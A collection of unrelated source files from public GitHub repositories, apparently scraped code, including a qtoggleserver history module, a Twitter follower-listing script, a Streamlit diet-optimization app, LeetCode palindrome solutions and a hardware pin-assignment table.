jp3.setRules('[{value":"one"}]') # error this is missing a quote
jp3.setRules('[{"value":"one"}]')
print(jp3)
####################################
# Historical 1 - Change if you want to hit the server
# r = GnipHistorical("user", "password", "https://historical.gnip.com/accounts/<yours>", jp)
# Creates a job
# print(r.createJob())
try:
r.acceptJob("not a URL") # error
except ValueError as e:
print(e)
# r.rejectJob("not a URL") # error
# r.jobStatus("not a URL") # error
# r.jobs() # get a list of jobs from the gnip server
| DrSkippy/Gnip-Python-Historical-Utilities | src/gnip_historical/gnip_historical.py | gnip_historical.py | py | 16,573 | python | en | code | 17 | github-code | 13 |
41229350274 | from cmath import exp
from unittest import result
def check_is_palindrome(idx1: int, idx2: int, s: str) -> bool:
# works only if idx1 <= idx2
piv = (idx1 + idx2) // 2
if idx1 == idx2:
return True
elif (idx2 - idx1 + 1) % 2 == 0:
return s[idx1 : piv + 1] == s[piv + 1 : idx2 + 1][::-1]
else:
return s[idx1:piv] == s[piv + 1 : idx2 + 1][::-1]
# wrong answer
def my_sol(s: str) -> str:
for length in range(len(s), 0, -1):
for idx in range(len(s) - length + 1):
if check_is_palindrome(idx, idx + length - 1, s):
return s[idx : idx + length]
def sol1(s: str) -> str:
def expand(left: int, right: int) -> str:
while left >= 0 and right < len(s) and s[left] == s[right]:
left -= 1
right += 1
return s[left + 1 : right]
if len(s) < 2 or s == s[::-1]:
return s
result = ""
for i in range(len(s) - 1):
result = max(result, expand(i, i + 1), expand(i, i + 2), key=len)
return result
| devpotatopotato/devpotatopotato-LeetCode-Solutions | Python_Algorithm_Interview/Ch6/6.py | 6.py | py | 1,041 | python | en | code | 0 | github-code | 13 |
19968351735 | from __future__ import annotations
import asyncio
import logging
import time
from typing import Iterable, Optional
from qtoggleserver import persist, system
from qtoggleserver.conf import settings
from qtoggleserver.core import events as core_events
from qtoggleserver.core import ports as core_ports
from qtoggleserver.core.typing import GenericJSONDict, PortValue
from qtoggleserver.utils import json as json_utils
PERSIST_COLLECTION = 'value_history'
_CACHE_TIMESTAMP_MIN_AGE = 3600 * 1000 # don't cache samples newer than this number of milliseconds ago
logger = logging.getLogger(__name__)
_history_event_handler: Optional[HistoryEventHandler] = None
_sampling_task: Optional[asyncio.Task] = None
_janitor_task: Optional[asyncio.Task] = None
# Samples cached by port_id and timestamp
_samples_cache: dict[str, dict[int, PortValue]] = {}
# Used to schedule sample removal with remove_samples(..., background=True)
_pending_remove_samples: list[tuple[core_ports.BasePort, Optional[int], Optional[int]]] = []
class HistoryEventHandler(core_events.Handler):
FIRE_AND_FORGET = True
async def handle_event(self, event: core_events.Event) -> None:
if not isinstance(event, core_events.ValueChange):
return # we're only interested in port value changes
if not system.date.has_real_date_time():
return # don't record history unless we've got real date/time
port = event.get_port()
history_interval = await port.get_history_interval()
if history_interval != -1:
return # only consider ports with history interval set to special -1 (on value change)
now_ms = int(time.time() * 1000)
await save_sample(port, now_ms)
port.set_history_last_timestamp(now_ms)
async def sampling_task() -> None:
while True:
try:
await asyncio.sleep(1)
if not system.date.has_real_date_time():
continue # don't record history unless we've got real date/time
now_ms = int(time.time() * 1000)
for port in core_ports.get_all():
if not port.is_enabled():
continue
history_last_timestamp = port.get_history_last_timestamp()
history_interval = await port.get_history_interval()
if history_interval <= 0: # disabled or on value change
continue
if now_ms - history_last_timestamp < history_interval * 1000:
continue
await save_sample(port, now_ms)
port.set_history_last_timestamp(now_ms)
port.save_asap() # history_last_timestamp must be persisted
except asyncio.CancelledError:
logger.debug('sampling task cancelled')
break
except Exception as e:
logger.error('sampling task error: %s', e, exc_info=True)
async def janitor_task() -> None:
global _pending_remove_samples
while True:
try:
await asyncio.sleep(settings.core.history_janitor_interval)
if not system.date.has_real_date_time():
continue
now = int(time.time())
for port in core_ports.get_all():
history_retention = await port.get_history_retention()
if history_retention <= 0:
continue
to_timestamp = (now - history_retention) * 1000
logger.debug('removing old samples of %s from history', port)
await remove_samples([port], from_timestamp=0, to_timestamp=to_timestamp)
# Remove samples that were background-scheduled for removal
# Group together requests w/o timestamp bounds
ports = []
rem_pending_remove_samples = []
for port, from_timestamp, to_timestamp in _pending_remove_samples:
if from_timestamp is to_timestamp is None:
ports.append(port)
else:
rem_pending_remove_samples.append((port, from_timestamp, to_timestamp))
if ports:
port_ids = [p.get_id() for p in ports]
logger.debug('removing samples of %s from history (background)', ', '.join(port_ids))
await remove_samples(ports)
_pending_remove_samples = rem_pending_remove_samples
while _pending_remove_samples:
port, from_timestamp, to_timestamp = _pending_remove_samples.pop(0)
logger.debug('removing samples of %s from history (background)', port)
await remove_samples([port], from_timestamp=from_timestamp, to_timestamp=to_timestamp)
except asyncio.CancelledError:
logger.debug('janitor task cancelled')
break
except Exception as e:
logger.error('janitor task error: %s', e, exc_info=True)
def is_enabled() -> bool:
return persist.is_history_supported() and settings.core.history_support
async def get_samples_slice(
port: core_ports.BasePort,
from_timestamp: Optional[int] = None,
to_timestamp: Optional[int] = None,
limit: Optional[int] = None,
sort_desc: bool = False
) -> Iterable[GenericJSONDict]:
filt = {
'pid': port.get_id(),
}
if from_timestamp is not None:
filt.setdefault('ts', {})['ge'] = from_timestamp
if to_timestamp is not None:
filt.setdefault('ts', {})['lt'] = to_timestamp
sort = 'ts'
if sort_desc:
sort = f'-{sort}'
results = await persist.query(PERSIST_COLLECTION, filt=filt, sort=sort, limit=limit)
return ({'value': r['val'], 'timestamp': r['ts']} for r in results)
async def get_samples_by_timestamp(
port: core_ports.BasePort,
timestamps: list[int]
) -> Iterable[GenericJSONDict]:
port_filter = {
'pid': port.get_id(),
}
now_ms = int(time.time() * 1000)
samples_cache = _samples_cache.setdefault(port.get_id(), {})
INEXISTENT = {}
query_tasks = []
for timestamp in timestamps:
# Look it up in cache
sample = samples_cache.get(timestamp, INEXISTENT)
if sample is INEXISTENT:
filt = dict(port_filter, ts={'le': timestamp})
task = persist.query(PERSIST_COLLECTION, filt=filt, sort='-ts', limit=1)
else:
task = asyncio.Future()
task.set_result([sample])
query_tasks.append(task)
task_results = await asyncio.gather(*query_tasks)
samples = []
for i, task_result in enumerate(task_results):
timestamp = timestamps[i]
query_results = list(task_result)
if query_results:
sample = query_results[0]
samples.append(sample)
else:
samples.append(None)
# Add sample to cache if it's old enough
if now_ms - timestamp > _CACHE_TIMESTAMP_MIN_AGE:
samples_cache[timestamp] = samples[-1]
return ({'value': r['val'], 'timestamp': r['ts']} if r is not None else None for r in samples)
async def save_sample(port: core_ports.BasePort, timestamp: int) -> None:
value = port.get_last_read_value()
if value is None:
logger.debug('skipping null sample of %s (timestamp = %s)', port, timestamp)
return
logger.debug('saving sample of %s (value = %s, timestamp = %s)', port, json_utils.dumps(value), timestamp)
record = {
'pid': port.get_id(),
'val': value,
'ts': timestamp
}
await persist.insert(PERSIST_COLLECTION, record)
async def remove_samples(
ports: list[core_ports.BasePort],
from_timestamp: Optional[int] = None,
to_timestamp: Optional[int] = None,
background: bool = False
) -> Optional[int]:
filt = {
'pid': {'in': [p.get_id() for p in ports]}
}
if from_timestamp is not None:
filt.setdefault('ts', {})['ge'] = from_timestamp
if to_timestamp is not None:
filt.setdefault('ts', {})['lt'] = to_timestamp
# Invalidate samples cache for the ports
for port in ports:
_samples_cache.pop(port.get_id(), None)
if background:
for port in ports:
_pending_remove_samples.append((port, from_timestamp, to_timestamp))
else:
return await persist.remove(PERSIST_COLLECTION, filt)
async def reset() -> None:
logger.debug('clearing persisted data')
await persist.remove(PERSIST_COLLECTION)
async def init() -> None:
global _history_event_handler
global _sampling_task
global _janitor_task
_history_event_handler = HistoryEventHandler()
core_events.register_handler(_history_event_handler)
_sampling_task = asyncio.create_task(sampling_task())
_janitor_task = asyncio.create_task(janitor_task())
await persist.ensure_index(PERSIST_COLLECTION, 'ts')
async def cleanup() -> None:
if _sampling_task:
_sampling_task.cancel()
await _sampling_task
if _janitor_task:
_janitor_task.cancel()
await _janitor_task
| qtoggle/qtoggleserver | qtoggleserver/core/history.py | history.py | py | 9,068 | python | en | code | 16 | github-code | 13 |
40170789643 | #! /usr/bin/python
# libraries
import tweepy
import sys
# twiiter application details
cKey = 'XXXXXXXXXXXXXXXXXXXXXXXXXX'
cSecret = 'XXXXXXXXXXXXXXXXXXXXXXXXXX'
aToken = 'XXXXXXXXXXXXXXXXXXXXXXXXXX'
aTokenSecret = 'XXXXXXXXXXXXXXXXXXXXXXXXXX'
# authentication
auth = tweepy.OAuthHandler(cKey, cSecret)
auth.set_access_token(aToken, aTokenSecret)
tw = tweepy.API(auth)
u = sys.argv[1]
# saves the following list in a variable
uFriends = tw.friends_ids(u)
# saves the follower list in a variable
uFollowers = tw.followers_ids(u)
# count total following
uFriendsC = tw.get_user(u).friends_count
# count total followers
uFollowersC = tw.get_user(u).followers_count
# list to save verfied twitter followers
vFs = []
# prints the following list of a user
def listFollowing():
print("Printing users, please wait.../\n")
for user in uFriends:
print(tw.get_user(user).screen_name + ', ',end='', flush=True)
# prints the followers list of a user
def listFollowers():
print("Printing users, please wait.../\n")
for user in uFollowers:
print(tw.get_user(user).screen_name + ', ',end='', flush=True)
# prints followers of a user who are following back
def doFollow():
print("Printing users, please wait.../\n")
for user in uFriends:
if user in uFollowers:
print(tw.get_user(user).screen_name + ', ',end='', flush=True)
# count the users who are following back
def doFollowC():
doFollowCount = 0
for user in uFriends:
if user in uFollowers:
doFollowCount += 1;
return doFollowCount
# prints followers a user who are not following back
def doNotFollow():
print("Printing users, please wait.../\n")
for user in uFriends:
if user not in uFollowers:
print(tw.get_user(user).screen_name + ', ',end='', flush=True)
# count the users who are following back
def noFollowC():
nFollowCount = 0
for user in uFriends:
if user not in uFollowers:
nFollowCount += 1;
return nFollowCount
# count the veified user who are following back
def verifiedFollowers():
vFC = 0
for user in uFriends:
if user in uFollowers:
if tw.get_user(user).verified == 1:
# save the verified user in vFs list
vFC += 1;
vFs.append(tw.get_user(user).screen_name)
# increment value of vFC if verfied == true
return vFC
# prints saved list of verified followers
def liVFs():
print("Printing users, please wait.../\n")
print (','.join(map(str, vFs)))
# calls various type of list functions
def viewList():
print(" \nGet list of,\n")
print(" Following [1] ")
print(" Followers [2] ")
print(" Following back [3] ")
print(" !Following back [4] ")
print(" Verified followers [5]")
print(" Exit [6] ")
print(" \nYour choice: ", end = '', flush=True)
d = input()
if d == '1':
listFollowing()
elif d == '2':
listFollowers()
elif d == '3':
doFollow()
elif d == '4':
doNotFollow()
elif d == '5':
liVFs()
elif d == '6':
system(exit)
else:
wrC()
print("\nSee the list again? [Y/n]: ", end='', flush=True)
dA = input()
while dA == 'Y' or dA == 'y':
viewList()
break
# prints wrong choice message
def wrC():
print("\nIt seems you have chosed a wrong option!")
viewList()
# basic information print
def printBasic(u):
print(" Name: " + tw.get_user(u).name)
print(" Username: " + u)
print(" Following: " + str(uFriendsC))
print(" Following back: " + str(doFollowC()))
print(" !Following back: " + str(noFollowC()))
print(" Followers: " + str(uFollowersC))
print(" ———————————————————————————————————————————————————————————————")
print(" Please wait till I check how many celebrities are following you,")
print(" the more follower you have the more time I take../")
print(" ———————————————————————————————————————————————————————————————")
print(" Verified: " + str(verifiedFollowers()))
# main function
def main():
print("\nTwitter Account Information Retreiver\n")
printBasic(u)
viewList()
print("\nMy functions are limited, perhaps that's it for now!")
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print('\nWhy cancel btw! Anyways, run again if you want../')
| IamLizu/twair | main.py | main.py | py | 4,819 | python | en | code | 0 | github-code | 13 |
31336251190 | import argparse
import protocol
import sys
from config import setup
from logger import init_logger, get_logger
from serial import Serial
logger = get_logger(__name__)
def parse_cmdline(argv):
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--config", required=True, help="Path to config")
parser.add_argument("-d", "--dev", required=True, help="Path to serial dev")
parser.add_argument("--params", metavar="params", nargs="*",
help="Extra parameters for commands")
return parser.parse_args(argv)
def main(args):
config = setup(args.config, args.params)
logger.info(config)
logger.info("Watching serial %s", args.dev)
with Serial(args.dev, config.baud_rate, timeout=config.timeout) as dev:
while True:
hello_message = protocol.init(dev)
logger.info("Received hello: %s", hello_message)
try:
while True:
magic, payload = protocol.readline(dev)
if magic == b"M":
logger.info("Recv message %s", payload)
elif magic == b"C":
cmd = int(payload.decode().strip())
logger.info("Recv command %s", cmd)
config.commands[cmd].run(log=True)
else:
raise ValueError(f"main: unexpected magic {magic}, mesg {payload}")
except KeyboardInterrupt:
break
except Exception as e:
logger.warning(f"Unhandled exception: {e}. Restarting.")
continue
if __name__ == "__main__":
main(parse_cmdline(sys.argv[1:]))
| bcskda/EvaCockpit | handler/main.py | main.py | py | 1,697 | python | en | code | 0 | github-code | 13 |
29942909305 | #! /usr/local/bin/python3.8
#_*_ coding: utf-8 _*_
#_*_ coding: gbk _*_
#Author: Collin Liew
import requests
import json
URL = "http://127.0.0.1:8008/api-token-auth/"
paras = {
"username":"admin",
"password":"admin",
}
def getcode(link,para):
req = requests.post(link,para)
respon = req.json()
return json.dumps(respon, indent=4, sort_keys=True)
dic_str = getcode(URL, paras)
dic_t = json.loads(dic_str)
for K,V in dic_t.items():
print(dic_t["token"][1])
rest = list(dic_t.values())
print(rest)
GETur = "http://127.0.0.1:8008/personnel/api/employees/4711971733/"
auth = {
"Authorization":"Token da328540365716418d22a81947c195a70639e5cd",
"Content-Type":"application/json",
}
def getUser(GETur,auth):
obtain = requests.get(GETur,headers=auth)
resp = obtain.json()
return json.dumps(resp,indent=4)
dic_PIN = getUser(GETur,auth)
dic_e = json.loads(dic_PIN)
for Ke,Va in dic_e.items():
print(dic_e["first_name"][1])
ret = list(dic_e.values())
def Convert(list_name):
for lis in list_name:
if isinstance(lis,list):
Convert(lis)
else:
print(lis)
Convert(ret)
| Blossom193/DemoforETP | DemoforETPAPI.py | DemoforETPAPI.py | py | 1,211 | python | en | code | 0 | github-code | 13 |
39671463668 | '''
用法同batch-images.py,只是把next_batch拿出来,解决最后threads不join的问题
'''
import tensorflow as tf
import matplotlib.pyplot as plt
import sys
import data_loader
image_list, label_list = data_loader.get_files('dataset/train/')
tf.flags.DEFINE_integer("image_h", 208, "image height")
tf.flags.DEFINE_integer("image_w", 208, "image width")
tf.flags.DEFINE_boolean("shuffle", False, "The batch data should shuffled or not")
# 如果num_epochs不是None的话,那么每次sess.run对应的image_batch等就会减1(注意:是运行才减1!!)
tf.flags.DEFINE_integer("num_epochs", None, "num of epochs")
tf.flags.DEFINE_integer("batch_size", 3, "batch size")
tf.flags.DEFINE_integer("num_threads", 32, "number of threads")
tf.flags.DEFINE_integer("capacity", 256, "capacity")
FLAGS = tf.flags.FLAGS
FLAGS(sys.argv) # 启用flags
# 转换普通的list为tf能识别的类型
image_list = tf.cast(image_list,tf.string)
label_list = tf.cast(label_list,tf.int32)
# 创建队列
input_queue = tf.train.slice_input_producer([image_list, label_list], shuffle=FLAGS.shuffle,num_epochs=FLAGS.num_epochs) # if there are 2 elms in the 1st param,the next sentence uses '[1]' to get that param
# get image's matrix
image_contents = tf.read_file(input_queue[0])
image = tf.image.decode_jpeg(image_contents,channels=3)
# the following 2 ways of resizing both make sense
image = tf.image.resize_image_with_crop_or_pad(image,FLAGS.image_h,FLAGS.image_w)
# get label
label = input_queue[1]
# 获取batch对象
image_batch, label_batch = tf.train.batch([image,label],batch_size=FLAGS.batch_size,num_threads=FLAGS.num_threads,capacity=FLAGS.capacity)
if FLAGS.num_epochs:
sess.run(tf.local_variables_initializer()) # initialize num_epochs
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.2)
config = tf.ConfigProto(gpu_options=gpu_options)
with tf.Session(config=config) as sess:
# 启动线程
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
try:
while not coord.should_stop():
# get & process the batch
images, labels = sess.run([image_batch, label_batch])
for i in range(FLAGS.batch_size):
print("label: %d" % labels[i])
plt.imshow(images[i, :, :, :])
plt.show()
break
except tf.errors.OutOfRangeError:
print("done!")
finally:
coord.request_stop()
coord.join(threads)
| changjiale3/machine-learning-codes | tensorflow/batch-images/batch-images2.py | batch-images2.py | py | 2,492 | python | en | code | 0 | github-code | 13 |
14092740561 | import discord
from discord.ext import commands
class Ban(commands.Cog):
config = {
"name": "ban",
"desc": "ban member",
"use": "ban @mention <reason>",
"author": "Anh Duc(aki team)"
}
def __init__(self, bot):
self.bot = bot
@commands.hybrid_command()
@commands.has_guild_permissions(ban_members=True)
@commands.bot_has_guild_permissions(ban_members=True)
@commands.cooldown(1, 4, commands.BucketType.user)
async def ban(self, ctx: commands.Context, member: discord.Member, *, reason=None):
await member.ban(reason=reason)
await ctx.send(f"Banned {member}.")
async def setup(bot):
await bot.add_cog(Ban(bot))
| iotran207/Aki-bot | command/ban.py | ban.py | py | 707 | python | en | code | 4 | github-code | 13 |
14187571320 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
from pulp import *
import streamlit as st
import altair as alt
st.title('Raw Material Optimization')
st.markdown('The concept was to use LP to find an optimal mix of raw igt to produce the chepest meal bar while meeting some contraint nutrion requrement')
# In[2]:
# Import Nutrition Data
st.header('Nutrition and Ingredient Costs Data ')
nutrition = pd.read_excel('Nutrition Facts.xlsx', index_col = 0)
# In[3]:
# Import Costs
costs = pd.read_excel('Costs.xlsx')
dict_costs = dict(zip(costs['Ingredients'], costs['Costs']))
# Display the Data two tables side by side
col3, col4 = st.columns(2)
with col3:
if st.sidebar.checkbox('Nutrition Data'):
st.write(nutrition)
with col4:
if st.sidebar.checkbox('Costs Data'):
st.write(costs)
# In[25]:
# Variables
variables = ['Chicken', 'Beef', 'Mutton', 'Rice', 'Wheat bran', 'Corn', 'Peanuts']
# Initialize Class
model = LpProblem("Optimize your Protein Bar", LpMinimize)
# Create Decision Variables
x = LpVariable.dicts("Qty", [j for j in variables],
lowBound=0, upBound=None, cat='continuous')
# Define Objective Function
model += (lpSum([dict_costs[i] * x[i] for i in variables]))
# Add Constraints
with st.sidebar:
st.sidebar.header("Meal Bar weight")
model += (lpSum([x[i] for i in variables])) == st.sidebar.number_input('Total weight', 100, 120)# 120gm total weight not more or less
st.sidebar.header("Nutritional Fact")
model += (lpSum([x[i] * nutrition.loc[i, 'Protein'] for i in variables])) >= st.sidebar.number_input('Prtotien range 0-20', 0, 20)
# int(input("Enter your Protien: ")) #protein
model += (lpSum([x[i] * nutrition.loc[i, 'Fat'] for i in variables])) <= st.sidebar.number_input('Fat range 0-22', 0, 22) #int(input("Enter your Fat: ")) #fat max
model += (lpSum([x[i] * nutrition.loc[i, 'Fibre'] for i in variables])) >= st.sidebar.number_input('Fiber range 0-6', 0, 6) #int(input("Enter your Fibre: ")) # fiber min
model += (lpSum([x[i] * nutrition.loc[i, 'Salt'] for i in variables])) <= st.sidebar.number_input('Salt range 0-3', 0, 3) #int(input("Enter your Salt: ")) # salt max
model += (lpSum([x[i] * nutrition.loc[i, 'Sugar'] for i in variables])) <= st.sidebar.number_input('Sugar range 0-30', 0, 30) #int(input("Enter your Sugar: ")) # sugar max
# Solve Model
Mod_var=[]
model.solve()
st.title('Cost Per Bar')
print("Cost per Bar = {:,} $".format(round(value(model.objective), 2)))
st.markdown(value(model.objective))
print('\n' + "Status: {}".format(LpStatus[model.status]))
for v in model.variables():
print(v.name, "=", round(v.varValue,2), 'g')
Mod_var.append({'Status':v.name,'Optimal':round(v.varValue,2)})
#Mod_var.append(a)
a=pd.DataFrame(Mod_var)
# Add a title to the plot
st.title('Table and Bar chart for Optimal Ingredient in gm')
# Display the table and the graph in two columns
col1, col2 = st.columns(2)
with col1:
st.write(a)
with col2:
st.bar_chart(a.set_index('Status'))
| devd1808/devd1808 | New.py | New.py | py | 3,332 | python | en | code | 0 | github-code | 13 |
43262796692 | from bisect import bisect_left
from collections import defaultdict
def main():
wall_x = defaultdict(lambda: [-1, W])
wall_y = defaultdict(lambda: [-1, H])
for xi, yi in XY:
wall_x[xi-1].append(yi-1)
wall_y[yi-1].append(xi-1)
for xi in wall_x:
wall_x[xi] = sorted(wall_x[xi])
for yi in wall_y:
wall_y[yi] = sorted(wall_y[yi])
x, y = SX-1, SY-1
for d, l in DL:
l, w, z = int(l), wall_x[x], y
if d in 'UD':
w, z = wall_y[y], x
idx = bisect_left(w, z)
if d == 'L':
y = max(y-l, w[idx-1] + 1)
if d == 'R':
y = min(y+l, w[idx] - 1)
if d == 'U':
x = max(x-l, w[idx-1] + 1)
if d == 'D':
x = min(x+l, w[idx] - 1)
print(x+1, y+1)
return
if __name__ == '__main__':
H, W, SX, SY = map(int, input().split())
N = int(input())
XY = [list(map(int, input().split())) for _ in range(N)]
Q = int(input())
DL = [list(input().split()) for _ in range(Q)]
main()
| Shirohi-git/AtCoder | abc271-/abc273_d.py | abc273_d.py | py | 1,059 | python | en | code | 2 | github-code | 13 |
74080582096 | import os
def color_table():
print("\033[0;37;40m Normal text\n")
print("\033[2;37;40m Underlined text\033[0;37;40m \n")
print("\033[1;37;40m Bright Colour\033[0;37;40m \n")
print("\033[3;37;40m Negative Colour\033[0;37;40m \n")
print("\033[5;37;40m Negative Colour\033[0;37;40m\n")
print("\033[1;37;40m \033[2;37:40m TextColour BlackBackground TextColour GreyBackground WhiteText ColouredBackground\033[0;37;40m\n")
print("\033[1;30;40m Dark Gray \033[0m 1;30;40m \033[0;30;47m Black \033[0m 0;30;47m \033[0;37;41m Black \033[0m 0;37;41m")
print("\033[1;31;40m Bright Red \033[0m 1;31;40m \033[0;31;47m Red \033[0m 0;31;47m \033[0;37;42m Black \033[0m 0;37;42m")
print("\033[1;32;40m Bright Green \033[0m 1;32;40m \033[0;32;47m Green \033[0m 0;32;47m \033[0;37;43m Black \033[0m 0;37;43m")
print("\033[1;33;40m Yellow \033[0m 1;33;40m \033[0;33;47m Brown \033[0m 0;33;47m \033[0;37;44m Black \033[0m 0;37;44m")
print("\033[1;34;40m Bright Blue \033[0m 1;34;40m \033[0;34;47m Blue \033[0m 0;34;47m \033[0;37;45m Black \033[0m 0;37;45m")
print("\033[1;35;40m Bright Magenta \033[0m 1;35;40m \033[0;35;47m Magenta \033[0m 0;35;47m \033[0;37;46m Black \033[0m 0;37;46m")
print("\033[1;36;40m Bright Cyan \033[0m 1;36;40m \033[0;36;47m Cyan \033[0m 0;36;47m \033[0;37;47m Black \033[0m 0;37;47m")
print("\033[1;37;40m White \033[0m 1;37;40m \033[0;37;40m Light Grey \033[0m 0;37;40m \033[0;37;48m Black \033[0m 0;37;48m")
def colour(col, bright=True, background = "black"):
if bright == True:
bright = "true"
if bright == False:
bright = "false"
colours = {"black":30,"red":31,"green":32,"yellow":33,"blue":34,"magenta":35,"cyan":36,"white":37}
br = {"true":1, "false":0}
return "\033[%s;%s;%sm" %(br[bright], colours[col], colours[background]+10)
class executer:
def __init__(self, name, desc, col):
self.name = name
self.description = desc
self.col = col
self.isCurrent = False
def get(self, command):
return "Default response to: %s\n"%command
def get_linestat(self):
return "~$ "
def getSelf(self):
return self
def eventOn(self):
pass
def eventOff(self):
pass
def base_interpereter(comm):
comm = comm.strip().lower()
if comm == "":
return
if comm[0:2] == "cd":
if comm[3:7] == "home":
os.chdir("C:\\Users\\%s" %os.getlogin())
comm = "cd %s" %comm[8::]
try:
os.chdir(comm[3::].replace("\"", ""))
return
except FileNotFoundError:
print(colour("red", bright=False) + "The system cannot find the path specified.\n")
return
if comm.strip().lower() == "help":
help = "\n".join([colour("magenta", bright=False)+
"help shows this message use \"help [commad]\" for more information",
"exec change executer use \"exec list\" to view all",
"NOTE: help is not build into all executers try \"help\" or \"/?\"",
"\n"])
print(help)
return
if comm.strip().lower() == "exit":
print("%sexiting%s\n"%(colour("green", bright=False), colour("white", bright=False)))
exit()
if comm.strip()[0:4].lower() == "exec":
arg = comm[5::].strip().lower()
if arg == "":
print("%sno argument specified\n"%colour("red", bright=False))
return
return ("exec", arg)
return comm
if __name__ == '__main__':
base_interpereter("exec")
base_interpereter("exec hello")
| JamesPerisher/better-cmd | base.py | base.py | py | 3,929 | python | en | code | 0 | github-code | 13 |
7847999714 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from pathlib_mate import Path
from .paths import DIR_AWS_TOOL_USER_DATA
from diskcache import Cache
PATH_CACHE_DIR = Path(DIR_AWS_TOOL_USER_DATA, ".cache")
class CustomCache(Cache):
def fast_get(self, key, callable, kwargs=None, expire=None):
value = self.get(key)
if value is None:
if kwargs is None:
kwargs = {}
value = callable(**kwargs)
self.set(key, value, expire=expire)
return value
cache = CustomCache(PATH_CACHE_DIR.abspath)
class CacheKeys:
aws_profile_list_from_config = None
aws_profile_and_region_list_from_config = None
for k in CacheKeys.__dict__.keys():
if not k.startswith("_"):
setattr(CacheKeys, k, k)
| MacHu-GWU/afwf_aws_tools-project | aws_tools/cache.py | cache.py | py | 796 | python | en | code | 4 | github-code | 13 |
32930025079 | import jwt
import xlsxwriter
from flask import request, render_template
from models import User
from settings import app, celery
def token_required(f):
def decorated(*args, **kwargs):
token = request.cookies.get('jwt')
if token:
data = jwt.decode(token, app.config['SECRET_KEY'], algorithms="HS256")
user: User = User.select_from_database(User.username == data['username'])
if user:
return f(*args, **kwargs)
else:
return render_template('login.html', message='Enter username and password')
return decorated
@celery.task(name='create_excel', bind=True)
def create_excel(self, result):
workbook = xlsxwriter.Workbook('apartments_divar.xlsx')
worksheet = workbook.add_worksheet()
headers = {'count': 10, 'meterage': 15, 'made_date': 15, 'rooms': 15,
'size_of_land': 15, 'floors': 15, 'features': 20, 'price_per_meter': 15,
'description': 50, 'total_price': 15, 'advertiser': 15, 'link': 30}
for row_num, data in enumerate(result):
if row_num == 0:
[(worksheet.write(0, i, key), worksheet.set_column(i, i, headers[key])) for i, key in
enumerate(list(data.keys()))]
for cul_num, value in enumerate(data.values()):
if isinstance(value, list):
value = ''.join(value)
worksheet.write(row_num + 1, cul_num, value)
workbook.close()
| TBEhsanDev/scraping-divar-apartments-sell | utils.py | utils.py | py | 1,467 | python | en | code | 0 | github-code | 13 |
3864252475 | """ pin_assignments.py
Assign pins and pin properties
This file can ultimately be replaced with an external YAML file
See first occurrence of each type for setup details
Setup for Tester Baseboard revB
"""
PIN_ASSIGNMENTS = {
# 1st tca9539 IO port expander - 16 digital inputs
'din0': {
'comment': 'Digital input channel 0', # comment is optional
'type': 'IO', # one of IO, ADC, DAC
'device': 'digital_0', # digital IO expander 0 (1 of 3: i.e. 0, 1, 2)
'port': 0, # port 0 or 1
'bit': 0, # bits 0 - 7
'direction': 1, # 0=output, 1=input
'polarity': 0, # 0=non-inverted, 1=inverted
# 'init': 0 # initial value on reset (outputs only)
},
'din1': {
'comment': 'Digital input channel 1',
'type': 'IO',
'device': 'digital_0',
'port': 0,
'bit': 1,
'direction': 1,
'polarity': 0,
},
'din2': {
'comment': 'Digital input channel 2',
'type': 'IO',
'device': 'digital_0',
'port': 0,
'bit': 2,
'direction': 1,
'polarity': 0,
},
'din3': {
'comment': 'Digital input channel 3',
'type': 'IO',
'device': 'digital_0',
'port': 0,
'bit': 3,
'direction': 1,
'polarity': 0,
},
'din4': {
'comment': 'Digital input channel 4',
'type': 'IO',
'device': 'digital_0',
'port': 0,
'bit': 4,
'direction': 1,
'polarity': 0,
},
'din5': {
'comment': 'Digital input channel 5',
'type': 'IO',
'device': 'digital_0',
'port': 0,
'bit': 5,
'direction': 1,
'polarity': 0,
},
'din6': {
'comment': 'Digital input channel 6',
'type': 'IO',
'device': 'digital_0',
'port': 0,
'bit': 6,
'direction': 1,
'polarity': 0,
},
'din7': {
'comment': 'Digital input channel 7',
'type': 'IO',
'device': 'digital_0',
'port': 0,
'bit': 7,
'direction': 1,
'polarity': 0,
},
'din8': {
'comment': 'Digital input channel 8',
'type': 'IO',
'device': 'digital_0',
'port': 1,
'bit': 0,
'direction': 1,
'polarity': 0,
},
'din9': {
'comment': 'Digital input channel 9',
'type': 'IO',
'device': 'digital_0',
'port': 1,
'bit': 1,
'direction': 1,
'polarity': 0,
},
'din10': {
'comment': 'Digital input channel 10',
'type': 'IO',
'device': 'digital_0',
'port': 1,
'bit': 2,
'direction': 1,
'polarity': 0,
},
'din11': {
'comment': 'Digital input channel 11',
'type': 'IO',
'device': 'digital_0',
'port': 1,
'bit': 3,
'direction': 1,
'polarity': 0,
},
'din12': {
'comment': 'Digital input channel 12',
'type': 'IO',
'device': 'digital_0',
'port': 1,
'bit': 4,
'direction': 1,
'polarity': 0,
},
'din13': {
'comment': 'Digital input channel 13',
'type': 'IO',
'device': 'digital_0',
'port': 1,
'bit': 5,
'direction': 1,
'polarity': 0,
},
'din14': {
'comment': 'Digital input channel 14',
'type': 'IO',
'device': 'digital_0',
'port': 1,
'bit': 6,
'direction': 1,
'polarity': 0,
},
'din15': {
'comment': 'Digital input channel 15',
'type': 'IO',
'device': 'digital_0',
'port': 1,
'bit': 7,
'direction': 1,
'polarity': 0,
},
# 2nd tca9539 IO port expander - 16 digital inputs
'din16': {
'comment': 'Digital input channel 16',
'type': 'IO',
'device': 'digital_1',
'port': 0,
'bit': 0,
'direction': 1,
'polarity': 0,
},
'din17': {
'comment': 'Digital input channel 17',
'type': 'IO',
'device': 'digital_1',
'port': 0,
'bit': 1,
'direction': 1,
'polarity': 0,
},
'din18': {
'comment': 'Digital input channel 18',
'type': 'IO',
'device': 'digital_1',
'port': 0,
'bit': 2,
'direction': 1,
'polarity': 0,
},
'din19': {
'comment': 'Digital input channel 19',
'type': 'IO',
'device': 'digital_1',
'port': 0,
'bit': 3,
'direction': 1,
'polarity': 0,
},
'din20': {
'comment': 'Digital input channel 20',
'type': 'IO',
'device': 'digital_1',
'port': 0,
'bit': 4,
'direction': 1,
'polarity': 0,
},
'din21': {
'comment': 'Digital input channel 21',
'type': 'IO',
'device': 'digital_1',
'port': 0,
'bit': 5,
'direction': 1,
'polarity': 0,
